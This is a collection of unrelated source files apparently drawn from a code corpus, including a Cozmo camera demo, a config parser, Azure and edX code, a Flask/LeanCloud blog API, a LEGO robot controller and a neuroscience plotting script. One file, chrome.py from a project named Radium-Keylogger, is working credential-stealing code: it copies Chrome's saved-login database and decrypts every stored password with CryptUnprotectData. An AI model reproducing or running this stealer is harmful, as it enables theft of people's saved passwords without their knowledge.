text_to_display += "\n"
text_to_display += "Current settings:\n\n"
text_to_display += 'Auto Exposure Enabled: %s\n' % camera.is_auto_exposure_enabled
text_to_display += 'Exposure: %s ms\n' % camera.exposure_ms
text_to_display += 'Gain: %.3f\n' % camera.gain
color_mode_str = "Color" if camera.color_image_enabled else "Grayscale"
text_to_display += 'Color Mode: %s\n' % color_mode_str
text = cozmo.annotate.ImageText(text_to_display,
position=cozmo.annotate.TOP_LEFT,
line_spacing=2,
color="white",
outline_color="black", full_outline=True)
text.render(d, bounds)
def demo_camera_exposure(robot: cozmo.robot.Robot):
global example_mode
# Ensure camera is in auto exposure mode and demonstrate auto exposure for 5 seconds
camera = robot.camera
camera.enable_auto_exposure()
example_mode = "Auto Exposure"
time.sleep(5)
# Demonstrate manual exposure, linearly increasing the exposure time, while
# keeping the gain fixed at a medium value.
example_mode = "Manual Exposure - Increasing Exposure, Fixed Gain"
fixed_gain = (camera.config.min_gain + camera.config.max_gain) * 0.5
for exposure in range(camera.config.min_exposure_time_ms, camera.config.max_exposure_time_ms+1, 1):
camera.set_manual_exposure(exposure, fixed_gain)
time.sleep(0.1)
# Demonstrate manual exposure, linearly increasing the gain, while keeping
# the exposure fixed at a relatively low value.
example_mode = "Manual Exposure - Increasing Gain, Fixed Exposure"
fixed_exposure_ms = 10
for gain in np.arange(camera.config.min_gain, camera.config.max_gain, 0.05):
camera.set_manual_exposure(fixed_exposure_ms, gain)
time.sleep(0.1)
# Switch back to auto exposure, demo for a final 5 seconds and then return
camera.enable_auto_exposure()
example_mode = "Mode: Auto Exposure"
time.sleep(5)
def cozmo_program(robot: cozmo.robot.Robot):
robot.world.image_annotator.add_annotator('camera_info', camera_info)
|
# Demo with default grayscale camera images
robot.camera.color_image_enabled = False
demo_camera_exposure(robot)
# Demo with color camera images
robot.camera.color_image_enabled = True
demo_camera_exposure(robot)
cozmo.robot.Robot.drive_off_charger_on_connect = False # Cozmo can stay on his charger for this example
cozmo.run_program(cozmo_program, use_viewer=True, force_viewer_on_top=True)
|
enricoba/eems-box
|
configbus.py
|
Python
|
mit
| 2,756
| 0.003266
|
class __ConfigBus(object):
def __init__(self):
"""Private object *_ConfigBus* provides private functions for various config classes.
"""
self.conf = 'eems.conf'
def _read(self):
"""Private function *_read* reads the eems.conf file and returns all lines.
:return: *list*
"""
with open(self.conf, 'r') as conf:
return conf.readlines()
def _write(self, content):
"""Private function *_write* writes the param content to the eems.conf file.
:param content: *string*
:return: *None*
"""
with open(self.conf, 'w') as conf:
conf.write(content)
class _Interval(__ConfigBus):
"""Private class *_Interval* inherits from *_ConfigBus* and provides functions to manipulate the interval.
"""
def read(self):
"""Public function *read* reads and returns the interval value.
:return: *int*
"""
conf = self._read()
value = [c for c in conf if c.strip('\n')[:8] == 'interval'][0].split(' ')[-1:][0].strip('\n')
return int(value)
def write(self, value):
"""Public function *write* writes the passed interval value into eems.conf file.
:param value: *int*
:return: *None*
"""
conf = self._read()
conf_new = ''
line = [c for c in conf if c.strip('\n')[:8] == 'interval'][0]
for x in range(len(conf)):
if conf[x] == line:
conf_new += 'interval {}\n'.format(value)
else:
conf_new += conf[x]
self._write(conf_new)
class _Monitoring(__ConfigBus):
"""Private class *_Monitoring* inherits
|
from *_ConfigBus* and provides functions to manipulate the monitoring flag.
"""
def read(self):
"""Public function *read* reads and returns the monitor
|
ing flag.
:return: *bool*
"""
conf = self._read()
value = [c for c in conf if c.strip('\n')[:10] == 'monitoring'][0].split(' ')[-1:][0].strip('\n')
        return bool(int(value))  # the flag is stored as 0/1 by write()
def write(self, value):
"""Public function *write* writes the monitoring flag into eems.conf file.
:param value: *bool* / *int*
:return: *None*
"""
conf = self._read()
conf_new = ''
line = [c for c in conf if c.strip('\n')[:10] == 'monitoring'][0]
for x in range(len(conf)):
if conf[x] == line:
conf_new += 'monitoring {}\n'.format(int(value))
else:
conf_new += conf[x]
self._write(conf_new)
class Config(object):
def __init__(self):
self.interval = _Interval()
self.monitoring = _Monitoring()
Config = Config()
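# Minimal usage sketch (illustration only; it assumes an 'eems.conf' file with
# 'interval ...' and 'monitoring ...' lines exists in the working directory):
#
#     from configbus import Config
#     seconds = Config.interval.read()
#     Config.interval.write(60)
#     enabled = Config.monitoring.read()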
|
jorik041/shmoocon_2014_talk
|
caravan/caravan/dashboards/infrastructure/workers/tables.py
|
Python
|
bsd-2-clause
| 977
| 0
|
from horizon import tables
from tasa.store import connection
class RestartWorker(tables.Action):
name = 'restart'
verbose_name = 'Restart Worker'
data_type_singular = 'Worker'
action_present = 'restart'
requires_input = False
classes = ('btn-warning',)
def handle(self, data_table, request, object_ids):
# Send a restart signal
connection.publish('control', 'restart')
class WorkerTable(tables.DataTable):
name = tables.Column('name', verbose_name='Name')
addr = tables.Column('address', verbose_name='Address')
port = tables.Column('port')
age = tables.Column('age')
idle = tables.Column('idle')
flags = tables.Column('flags')
cmd = tables.Column('cmd', verbose_name='Last Command')
def get_object_id(self, datum):
        return datum['addr']
class Meta:
name = 'workers'
verbose_name = 'Connections'
table_actions = (RestartWorker,)
multi_select = False
|
lmazuel/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/v2016_12_01/models/flow_log_information_py3.py
|
Python
|
mit
| 2,020
| 0.00099
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class FlowLogInformation(Model):
"""Information on the configuration of flow log.
All required parameters must be populated in order to send to Azure.
:param target_resource_id: Required. The ID of the resource to configure
for flow logging.
:type target_resource_id: str
:param storage_id: Required. ID of the storage account which is used to
store the flow log.
:type storage_id: str
:param enabled: Required. Flag to enable/disable flow logging.
:type enabled: bool
:param retention_policy:
    :type retention_policy:
     ~azure.mgmt.network.v2016_12_01.models.RetentionPolicyParameters
"""
_validation = {
'target_resource_id': {'required': True},
'storage_id': {'required': True},
'enabled': {'required': True},
}
_attribute_map = {
'target_resource_id': {'key': 'targetResourceId', 'type': 'str'},
'storage_id': {'key': 'properties.storageId', 'type': 'str'},
'enabled': {'key': 'properties.enabled', 'type': 'bool'},
'retention_policy': {'key': 'properties.retentionPolicy', 'type': 'RetentionPolicyParameters'},
}
def __init__(self, *, target_resource_id: str, storage_id: str, enabled: bool, retention_policy=None, **kwargs) -> None:
super(FlowLogInformation, self).__init__(**kwargs)
self.target_resource_id = target_resource_id
self.storage_id = storage_id
self.enabled = enabled
self.retention_policy = retention_policy
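# Minimal construction sketch (the resource IDs below are placeholders, not
# real Azure identifiers):
#
#     info = FlowLogInformation(
#         target_resource_id='/subscriptions/.../networkSecurityGroups/example-nsg',
#         storage_id='/subscriptions/.../storageAccounts/examplestorage',
#         enabled=True)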
|
stiletto/bnw
|
bnw_shell.py
|
Python
|
bsd-2-clause
| 122
| 0.016393
|
#!/usr/bin/env python
import os.path as path
import sys
root=path.abspath(path.dirname(__file__))
sys.path.insert(0,root)
|
mehulj94/Radium-Keylogger
|
Recoveries/chrome.py
|
Python
|
apache-2.0
| 2,142
| 0.010271
|
import sqlite3
import shutil
import win32crypt
import sys, os, platform
class Chrome():
def __init__(self):
pass
def run(self):
database_path = ''
if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ:
# For Win7
            path_Win7 = os.environ.get('HOMEDRIVE') + os.environ.get(
                'HOMEPATH') + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data'
# For XP
path_XP = os.environ.get('HOMEDRIVE') + os.environ.get(
'HOMEPATH') + '\AppData\Local\Google\Chrome\User Data\Default\Login Data'
if os.path.exists(path_XP):
database_path = path_XP
elif os.path.exists(path_Win7):
database_path = path_Win7
else:
return
else:
return
# Copy database before to query it (bypass lock errors)
try:
shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db')
database_path = os.getcwd() + os.sep + 'tmp_db'
except Exception, e:
pass
# Connect to the Database
try:
conn = sqlite3.connect(database_path)
cursor = conn.cursor()
except Exception, e:
return
# Get the results
try:
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
except:
return
pwdFound = []
for result in cursor.fetchall():
values = {}
try:
# Decrypt the Password
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
except Exception, e:
password = ''
if password:
values['Site'] = result[0]
values['Username'] = result[1]
values['Password'] = password
pwdFound.append(values)
conn.close()
if database_path.endswith('tmp_db'):
os.remove(database_path)
return pwdFound
#tem = Chrome()
#a = tem.run()
#print a
|
antoviaque/edx-platform
|
lms/djangoapps/course_api/blocks/tests/test_api.py
|
Python
|
agpl-3.0
| 2,533
| 0.003158
|
"""
Tests for Blocks api.py
"""
from django.test.client import RequestFactory
from course_blocks.tests.helpers import EnableTransformerRegistryMixin
from student.tests.factories import UserFactory
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import SampleCourseFactory
from ..api import get_blocks
class TestGetBlocks(EnableTransformerRegistryMixin, SharedModuleStoreTestCase):
"""
Tests for the get_blocks function
"""
@classmethod
def setUpClass(cls):
super(TestGetBlocks, cls).setUpClass()
cls.course = SampleCourseFactory.create()
# hide the html block
cls.html_block = cls.store.get_item(cls.course.id.make_usage_key('html', 'html_x1a_1'))
cls.html_block.visible_to_staff_only = True
cls.store.update_item(cls.html_block, ModuleStoreEnum.UserID.test)
def setUp(self):
super(TestGetBlocks, self).setUp()
self.user = UserFactory.create()
self.request = RequestFactory().get("/dummy")
self.request.user = self.user
def test_basic(self):
blocks = get_blocks(self.request, self.course.location, self.user)
self.assertEquals(blocks['root'], unicode(self.course.location))
# subtract for (1) the orphaned course About block and (2) the hidden Html block
        self.assertEquals(len(blocks['blocks']), len(self.store.get_items(self.course.id)) - 2)
self.assertNotIn(unicode(self.html_block.location), blocks['blocks'])
def test_no_user(self):
blocks = get_blocks(self.request, self.course.location)
|
self.assertIn(unicode(self.html_block.location), blocks['blocks'])
def test_access_before_api_transformer_order(self):
"""
Tests the order of transformers: access checks are made before the api
transformer is applied.
"""
blocks = get_blocks(self.request, self.course.location, self.user, nav_depth=5, requested_fields=['nav_depth'])
vertical_block = self.store.get_item(self.course.id.make_usage_key('vertical', 'vertical_x1a'))
problem_block = self.store.get_item(self.course.id.make_usage_key('problem', 'problem_x1a_1'))
vertical_descendants = blocks['blocks'][unicode(vertical_block.location)]['descendants']
self.assertIn(unicode(problem_block.location), vertical_descendants)
self.assertNotIn(unicode(self.html_block.location), vertical_descendants)
|
feedhq/feedhq
|
feedhq/feeds/management/commands/sync_scheduler.py
|
Python
|
bsd-3-clause
| 1,310
| 0
|
import structlog
from more_itertools import chunked
from rache import delete_job, scheduled_jobs
from . import SentryCommand
from ...models import UniqueFeed
from ....utils import get_redis_connection
logger = structlog.get_logger(__name__)
class Command(SentryCommand):
"""Syncs the UniqueFeeds and the scheduler:
- removes scheduled feeds which are missing from uniquefeeds
- adds missing uniquefeeds to the scheduler
"""
def handle_sentry(self, *args, **kwargs):
connection = get_redis_connection()
existing_jobs = set(scheduled_jobs(connection=connection))
target = set(UniqueFeed.objects.filter(muted=False).values_list(
'url', flat=True))
to_delete = existing_jobs - target
if to_delete:
logger.info("deleting jobs from the scheduler",
count=len(to_delete))
|
            for job_id in to_delete:
delete_job(job_id, connection=connection)
to_add = target - existing_jobs
if to_add:
logger.info("adding jobs to the scheduler", count=len(to_add))
for chunk in chunked(to_add, 10000):
uniques = UniqueFeed.objects.filter(url__in=chunk)
for unique in uniques:
unique.schedule()
|
autorealm/MayoiNeko
|
develop/apis.py
|
Python
|
apache-2.0
| 9,771
| 0.005366
|
# coding: utf-8
import re, time, hashlib, logging, json, functools
import os
import markdown2
from datetime import datetime
from leancloud import Object
from leancloud import User
from leancloud import Query
from leancloud import LeanCloudError
from flask import request
from flask import make_response
from flask import session
from develop.models import Blog, Comments, Page, Err
_COOKIE_NAME = 'mayoineko_skey'
_COOKIE_KEY = 'Nikora'
def _current_path():
return os.path.abspath('.')
def _now():
return datetime.now().strftime('%y-%m-%d_%H.%M.%S')
def _dump(obj):
if isinstance(obj, list):
objs = []
for o in obj:
objs.append(_dump(o))
return objs
if isinstance(obj, Page):
return {
'page_index': obj.page_index,
'page_count': obj.page_count,
'item_count': obj.item_count,
'has_next': obj.has_next,
'has_previous': obj.has_previous
}
if isinstance(obj, Blog):
return {
'id': obj.id,
'name': obj.get('name'),
            'summary': obj.get('summary'),
'content': obj.get('content'),
#'user_name': obj.get('user').get('username'),
            'created_at': str(obj.created_at)
}
if isinstance(obj, Comments):
return {
'id': obj.id,
#'user_name': obj.get('user').get('username'),
'content': obj.get('content'),
'created_at': str(obj.created_at)
}
if isinstance(obj, User):
return {
'id': obj.id,
'username': obj.get('username'),
'password': obj.get('password'),
'email': obj.get('email')
}
raise TypeError('%s is not JSON serializable' % obj)
def dumps(obj):
return json.dumps(obj, default=_dump)
def api(func):
@functools.wraps(func)
def _wrapper(*args, **kw):
try:
r = dumps(func(*args, **kw))
except Err, e:
r = json.dumps(dict(error=e.error, data=e.data, message=e.message))
except Exception, e:
logging.exception(e)
r = json.dumps(dict(error='internalerror', data=e.__class__.__name__, message=e.message))
make_response().headers['content-type'] = 'application/json'
return r
return _wrapper
def make_signed_cookie(id, password, max_age):
# build cookie string by: id-expires-md5
expires = str(int(time.time() + (max_age or 86400)))
L = [id, expires, hashlib.md5('%s-%s-%s-%s' % (id, password, expires, _COOKIE_KEY)).hexdigest()]
return '-'.join(L)
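# For illustration: the cookie produced above is the three dash-joined fields
# "<user id>-<expiry unix time>-<md5 of 'id-password-expires-_COOKIE_KEY'>",
# e.g. (hypothetical values) "5a1f...-1500000000-9b74c9897bac770ffc029102a200c5de",
# which parse_signed_cookie below splits and verifies.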
def parse_signed_cookie(cookie_str):
try:
L = cookie_str.split('-')
if len(L) != 3:
return None
id, expires, md5 = L
if int(expires) < time.time():
return None
user = User().get(id)
if user is None:
return None
if md5 != hashlib.md5('%s-%s-%s-%s' % (id, user.password, expires, _COOKIE_KEY)).hexdigest():
return None
return user
except:
return None
def check_login():
cookie = request.cookies.get(_COOKIE_NAME)
if cookie:
user = parse_signed_cookie(cookie)
else:
user = None;
if user is None:
if _COOKIE_NAME in session:
user = parse_signed_cookie(session[_COOKIE_NAME])
return user;
@api
def sign_in(username, password, remember='false'):
try:
User().login(username, password)
user = Query(User).equal_to("username", username).first()
except LeanCloudError, e:
raise e
max_age = 604800 if remember=='true' else None
cookie = make_signed_cookie(user.id, user.get('password'), max_age)
response = make_response();
response.set_cookie(_COOKIE_NAME, cookie, max_age=max_age)
session.permanent = False
session[_COOKIE_NAME] = cookie
return user
_RE_EMAIL = re.compile(r'^[a-z0-9\.\-\_]+\@[a-z0-9\-\_]+(\.[a-z0-9\-\_]+){1,4}$')
_RE_MD5 = re.compile(r'^[0-9a-f]{32}$')
@api
def sign_up(username, password, email):
email = email.strip().lower()
if not email or not _RE_EMAIL.match(email):
raise Err('value:invalid', 'email', 'email cannot be empty.')
user = User()
user.set("username", username)
user.set("password", password)
user.set("email", email)
try:
user.sign_up()
except LeanCloudError, e:
raise e
return user
def sign_out():
make_response().set_cookie(_COOKIE_NAME, None)
session.pop(_COOKIE_NAME, None)
@api
def list_users():
page_index = 1
page_size = 26
page = None
users = []
try:
page_index = int(request.args.get('page', '1'))
except ValueError:
pass
try:
total = Query(User).count();
page = Page(total, page_index, page_size)
users = Query(User).descending('createdAt').skip(page.offset).limit(page.page_size).find()
except LeanCloudError, e:
        if e.code == 101: # the corresponding Class has not been created on the server yet
users = []
else:
raise e
return dict(users=users, page=page)
@api
def get_user(user_id):
user = Query(User).get(user_id)
if user:
return user
raise Err('value:notfound', 'user', 'user not found.')
@api
def list_blogs():
format = request.args.get('format', '')
page_index = 1
page_size = 26
page = None
blogs = []
try:
page_index = int(request.args.get('page', '1'))
except ValueError:
pass
try:
total = Query(Blog).count();
page = Page(total, page_index, page_size)
blogs = Query(Blog).descending('createdAt').skip(page.offset).limit(page.page_size).find()
except LeanCloudError, e:
        if e.code == 101: # the corresponding Class has not been created on the server yet
blogs = []
else:
raise e
#logging.debug(blogs)
if format=='html':
for blog in blogs:
blog.content = markdown2.markdown(blog.content)
return dict(blogs=blogs, page=page)
@api
def get_blog(blog_id):
blog = Query(Blog).get(blog_id)
if blog:
return blog
raise Err('value:notfound', 'blog', 'blog not found.')
@api
def update_blog(blog_id, name='', summary='', content=''):
name = name.strip()
summary = summary.strip()
content = content.strip()
if not name:
raise Err('value:invalid', 'name', 'name cannot be empty.')
if not summary:
raise Err('value:invalid', 'summary', 'summary cannot be empty.')
if not content:
raise Err('value:invalid', 'content', 'content cannot be empty.')
user = check_login()
#if user is None:
#raise Err('value:notfound', 'user', 'user not found.')
blog = None
try:
blog = Query(Blog).get(blog_id)
except LeanCloudError, e:
pass
try:
if blog is None:
blog = Blog(name=name, summary=summary, content=content, user=user)
else:
blog.set('name', name)
blog.set('summary', summary)
blog.set('content', content)
blog.save()
except LeanCloudError, e:
raise e
return blog
@api
def delete_blog(blog_id):
blog = Query(Blog).get(blog_id)
if blog is None:
raise Err('value:notfound', 'blog', 'blog not found.')
blog.destroy()
return blog
@api
def comment(blog_id, content=''):
user = check_login()
if user is None:
raise Err('value:notfound', 'user', 'user not found.')
content = content.strip()
if not content:
raise Err('value:invalid', 'content', 'content cannot be empty.')
try:
blog = Query(Blog).get(blog_id)
        comment = Comments(blog=blog, user=user, content=content)
comment.save()
except LeanCloudError, e:
raise e
return comment
@api
def get_comments(blog_id):
blog = None
comments = None
user = None
try:
blog = Query(Blog).equal_to("objectId", blog_id).first()
if blog is None:
raise Err('value:notfound', 'blog', 'blog not found.')
try:
comments = Query(Comments).equal_to("blog", blog).descending('createdAt').find()
except LeanCloudError, e:
pass
except LeanCloudError, e:
|
jminyu/PatternRecognition_library
|
Data_generation.py
|
Python
|
gpl-3.0
| 2,150
| 0.012093
|
__author__ = 'Schmidtz'
import matplotlib
import numpy as np
import matplotlib.cm as cm
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
from numpy import matlib
from numpy import *
from numpy.random import *
import pylab as p
import math
from scipy import stats, mgrid, c_, reshape, random, rot90, linalg
from Prob_function import *
def genData(Ndat):
c1 = 0.5
r1 = 0.4
r2 = 0.3
# generate enough data to filter
N = 20*Ndat
X = array(random_sample(N))
Y = array(random_sample(N))
    X1 = X[(X-c1)*(X-c1) + (Y-c1)*(Y-c1) < r1*r1]
|
Y1 = Y[(X-c1)*(X-c1) + (Y-c1)*(Y-c1) < r1*r1]
X2 = X1[(X1-c1)*(X1-c1) + (Y1-c1)*(Y1-c1) > r2*r2]
Y2 = Y1[(X1-c1)*(X1-c1) + (Y1-c1)*(Y1-c1) > r2*r2]
X3 = X2[ abs(X2-Y2)>0.05 ]
Y3 = Y2[ abs(X2-Y2)>0.05 ]
#X3 = X2[ X2-Y2>0.15 ]
#Y3 = Y2[ X2-Y2>0.15]
X4=zeros(Ndat, dtype=float32)
Y4=zeros(Ndat, dtype=float32)
for i in xrange(Ndat):
if (X3[i]-Y3[i]) >0.05:
X4[i] = X3[i] + 0.08
Y4[i] = Y3[i] + 0.18
else:
X4[i] = X3[i] - 0.08
Y4[i] = Y3[i] - 0.18
print "X", size(X3[0:Ndat]), "Y", size(Y3)
return(vstack((X4[0:Ndat],Y4[0:Ndat])))
if __name__ == "__main__":
random.seed(12345)
dat = genData(500)
print dat.shape
plt.figure(1)
plt.plot(dat[0,:],dat[1,:],'b.')
sigma_x, mu_x = shoot(dat[0,:])
sigma_y, mu_y = shoot(dat[1,:])
matplotlib.rcParams['xtick.direction'] = 'out'
matplotlib.rcParams['ytick.direction'] = 'out'
delta = 0.025
X, Y = np.meshgrid(dat[0,:],dat[1,:])
G = mlab.bivariate_normal(X, Y, sigma_x, sigma_y, mu_x, mu_y)
# Create a simple contour plot with labels using default colors. The
    # inline argument to clabel will control whether the labels are drawn
# over the line segments of the contour, removing the lines beneath
# the label
CS = plt.contour(X, Y, G)
plt.title('Simplest default with labels')
plt.show()
|
KMPSUJ/lego_robot
|
pilot.py
|
Python
|
mit
| 4,781
| 0.001884
|
# -*- coding: utf-8 -*-
from modules import Robot
import time
r = Robot.Robot()
state = [0, 1000, 1500]
(run, move, write) = range(3)
i = run
slowdown = 1
flag_A = 0
flag_C = 0
lock = [0, 0, 0, 0]
while(True):
a = r.Read()
for it in range(len(lock)):
if lock[it]:
lock[it] = lock[it] - 1
    if a[0]: # continuous control
flag_A = 0
flag_C = 0
if a[0] == 1 or a[0] == 5 or a[0] == 6:
r.A.run_forever(r.S/slowdown)
elif a[0] == 2 or a[0] == 7 or a[0] == 8:
r.A.run_forever(-r.S/slowdown)
else:
r.A.stop()
if a[0] == 3 or a[0] == 5 or a[0] == 7:
r.C.run_forever(r.S/slowdown)
elif a[0] == 4 or a[0] == 6 or a[0] == 8:
r.C.run_forever(-r.S/slowdown)
else:
r.C.stop()
    elif a[1] and not lock[1]: # left control: discrete
        if a[1] == 1 and i is not run: # right control: continuous
r.changestate(state[i]-state[i-1])
i = i-1
time.sleep(0.5) # (state[i]-state[i-1])/r.S
if i is run:
slowdown = 1
elif a[1] == 2 and i is not write:
r.changestate(state[i]-state[i+1])
i = i+1
slowdown = 5
time.sleep(0.5) # (state[i+1]-state[i])/r.S
elif a[1] == 3:
r.B.run_forever(r.S)
elif a[1] == 4:
r.B.run_forever(-r.S)
elif a[1] == 9:
r.B.stop()
else:
pass
    elif a[2]: # one-click control
        if a[2] == 1 or a[2] == 5 or a[2] == 6: # stop on 9 (beacon)
if flag_A == -1:
r.A.stop()
flag_A = 0
lock[0] = 30 # lock = 30
elif not lock[0]:
r.A.run_forever(r.S/slowdown)
flag_A = 1
elif a[2] == 2 or a[2] == 7 or a[2] == 8:
if flag_A == 1:
r.A.stop()
flag_A = 0
lock[1] = 30 # lock = 30
elif not lock[1]:
r.A.run_forever(-r.S/slowdown)
flag_A = -1
if a[2] == 3 or a[2] == 5 or a[2] == 7:
if flag_C == -1:
r.C.stop()
flag_C = 0
lock[2] = 30 # lock = 30
elif not lock[2]:
r.C.run_forever(r.S/slowdown)
flag_C = 1
elif a[2] == 4 or a[2] == 6 or a[2] == 8:
if flag_C == 1:
                r.C.stop()
flag_C = 0
lock[3] = 30 # lock = 30
elif not lock[3]:
r.C.run_forever(-r.S/slowdown)
flag_C = -1
if a[2] == 9:
r.stop()
flag_A = 0
flag_C = 0
    elif a[3]: # alternative one-click
        if a[3] == 1: # button 1 - both motors
if flag_A == -1 and flag_C == -1:
r.stop()
flag_A = 0
flag_C = 0
lock[0] = 30 # lock = 30
elif not lock[0]:
r.run(r.S/slowdown, r.S/slowdown)
flag_A = 1
flag_C = 1
elif a[3] == 2:
if flag_A == 1 and flag_C == 1:
r.stop()
flag_A = 0
flag_C = 0
lock[1] = 30 # lock = 30
elif not lock[1]:
r.run(-r.S/slowdown, -r.S/slowdown)
flag_A = -1
flag_C = -1
elif a[3] == 3:
if flag_A == 1 and flag_C == -1:
r.stop()
flag_A = 0
flag_C = 0
                lock[2] = 30 # lock = 30
elif not lock[2]:
r.run(-r.S/slowdown, r.S/slowdown)
flag_A = -1
flag_C = 1
elif a[3] == 4:
if flag_A == -1 and flag_C == 1:
r.stop()
flag_A = 0
|
flag_C = 0
lock[3] = 30 # lock = 30
elif not lock[3]:
r.run(r.S/slowdown, -r.S/slowdown)
flag_A = 1
flag_C = -1
elif a[3] == 9:
r.stop()
flag_A = 0
flag_C = 0
else:
if not flag_A:
r.A.stop()
if not flag_C:
r.C.stop()
|
gviejo/ThalamusPhysio
|
python/figure_talk/main_talk_7_corr.py
|
Python
|
gpl-3.0
| 14,903
| 0.034825
|
import numpy as np
import pandas as pd
# from matplotlib.pyplot import plot,show,draw
import scipy.io
import sys
sys.path.append("../")
from functions import *
from pylab import *
from sklearn.decomposition import PCA
import _pickle as cPickle
import matplotlib.cm as cm
import os
###############################################################################################################
# TO LOAD
###############################################################################################################
store = pd.HDFStore("../../figures/figures_articles_v2/figure6/determinant_corr.h5", 'r')
det_all = store['det_all']
shufflings = store['shufflings']
shuffl_shank = store['shuffling_shank']
store.close()
data_directory = '/mnt/DataGuillaume/MergedData/'
datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#')
# WHICH NEURONS
space = pd.read_hdf("../../figures/figures_articles_v2/figure1/space.hdf5")
burst = pd.HDFStore("/mnt/DataGuillaume/MergedData/BURSTINESS.h5")['w']
burst = burst.loc[space.index]
hd_index = space.index.values[space['hd'] == 1]
# neurontoplot = [np.intersect1d(hd_index, space.index.values[space['cluster'] == 1])[0],
# burst.loc[space.index.values[space['cluster'] == 0]].sort_values('sws').index[3],
# burst.sort_values('sws').index.values[-20]]
firing_rate = pd.read_hdf("/mnt/DataGuillaume/MergedData/FIRING_RATE_ALL.h5")
fr_index = firing_rate.index.values[((firing_rate >= 1.0).sum(1) == 3).values]
# SWR MODULATION
swr_mod, swr_ses = loadSWRMod('/mnt/DataGuillaume/MergedData/SWR_THAL_corr.pickle', datasets, return_index=True)
nbins = 400
binsize = 5
times = np.arange(0, binsize*(nbins+1), binsize) - (nbins*binsize)/2
swr = pd.DataFrame( columns = swr_ses,
index = times,
data = gaussFilt(swr_mod, (5,)).transpose())
swr = swr.loc[-500:500]
# AUTOCORR FAST
store_autocorr = pd.HDFStore("/mnt/DataGuillaume/MergedData/AUTOCORR_ALL.h5")
autocorr_wak = store_autocorr['wake'].loc[0.5:]
autocorr_rem = store_autocorr['rem'].loc[0.5:]
autocorr_sws = store_autocorr['sws'].loc[0.5:]
autocorr_wak = autocorr_wak.rolling(window = 20, win_type = 'gaussian', center = True, min_periods = 1).mean(std = 3.0)
autocorr_rem = autocorr_rem.rolling(window = 20, win_type = 'gaussian', center = True, min_periods = 1).mean(std = 3.0)
autocorr_sws = autocorr_sws.rolling(window = 20, win_type = 'gaussian', center = True, min_periods = 1).mean(std = 3.0)
autocorr_wak = autocorr_wak[2:20]
autocorr_rem = autocorr_rem[2:20]
autocorr_sws = autocorr_sws[2:20]
neurons = np.intersect1d(swr.dropna(1).columns.values, autocorr_sws.dropna(1).columns.values)
neurons = np.intersect1d(neurons, fr_index)
X = np.copy(swr[neurons].values.T)
Y = np.copy(np.vstack((autocorr_wak[neurons].values,autocorr_rem[neurons].values, autocorr_sws[neurons].values))).T
Y = Y - Y.mean(1)[:,np.newaxis]
Y = Y / Y.std(1)[:,np.newaxis]
pca_swr = PCA(n_components=10).fit(X)
pca_aut = PCA(n_components=10).fit(Y)
pc_swr = pca_swr.transform(X)
pc_aut = pca_aut.transform(Y)
All = np.hstack((pc_swr, pc_aut))
corr = np.corrcoef(All.T)
#shuffle
Xs = np.copy(X)
Ys = np.copy(Y)
np.random.shuffle(Xs)
np.random.shuffle(Ys)
pc_swr_sh = PCA(n_components=10).fit_transform(Xs)
pc_aut_sh = PCA(n_components=10).fit_transform(Ys)
Alls = np.hstack((pc_swr_sh, pc_aut_sh))
corrsh = np.corrcoef(Alls.T)
###############################################################################################################
# PLOT
###############################################################################################################
def figsize(scale):
fig_width_pt = 483.69687 # Get this from LaTeX using \the\textwidth
inches_per_pt = 1.0/72.27 # Convert pt to inch
golden_mean = (np.sqrt(5.0)-1.0)/2.0 # Aesthetic ratio (you could change this)
fig_width = fig_width_pt*inches_per_pt*scale # width in inches
fig_height = fig_width*golden_mean # height in inches
fig_size = [fig_width,fig_height]
return fig_size
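# Worked example of the conversion above: figsize(2.0) gives a width of
# 2 * 483.69687 pt / 72.27 pt-per-inch ~= 13.39 in and a height of
# 13.39 * 0.618 ~= 8.27 in, i.e. roughly [13.39, 8.27] (the size used below).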
def simpleaxis(ax):
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
# ax.xaxis.set_tick_params(size=6)
# ax.yaxis.set_tick_params(size=6)
def noaxis(ax):
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.set_xticks([])
ax.set_yticks([])
# ax.xaxis.set_tick_params(size=6)
# ax.yaxis.set_tick_params(size=6)
import matplotlib as mpl
from mpl_toolkits.axes_grid1 import make_axes_locatable
# mpl.use("pdf")
pdf_with_latex = { # setup matplotlib to use latex for output
"pgf.texsystem": "pdflatex", # change this if using xetex or lautex
# "text.usetex": True, # use LaTeX to write all text
# "font.family": "serif",
"font.serif": [], # blank entries should cause plots to inherit fonts from the document
"font.sans-serif": [],
"font.monospace": [],
"axes.labelsize": 16, # LaTeX default is 10pt font.
"font.size": 16,
"legend.fontsize": 16, # Make the legend/label fonts a little smaller
"xtick.labelsize": 16,
"ytick.labelsize": 16,
"pgf.preamble": [
r"\usepackage[utf8x]{inputenc}", # use utf8 fonts becasue your computer can handle it :)
r"\usepackage[T1]{fontenc}", # plots will be generated using this preamble
],
"lines.markeredgewidth" : 0.2,
"axes.linewidth" : 2,
"ytick.major.size" : 3,
"xtick.major.size" : 3
}
mpl.rcParams.update(pdf_with_latex)
import matplotlib.gridspec as gridspec
from matplotlib.pyplot import *
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
import matplotlib.cm as cmx
import matplotlib.colors as colors
# colors = ['#444b6e', '#708b75', '#9ab87a']
fig = figure(figsize = figsize(2.0))
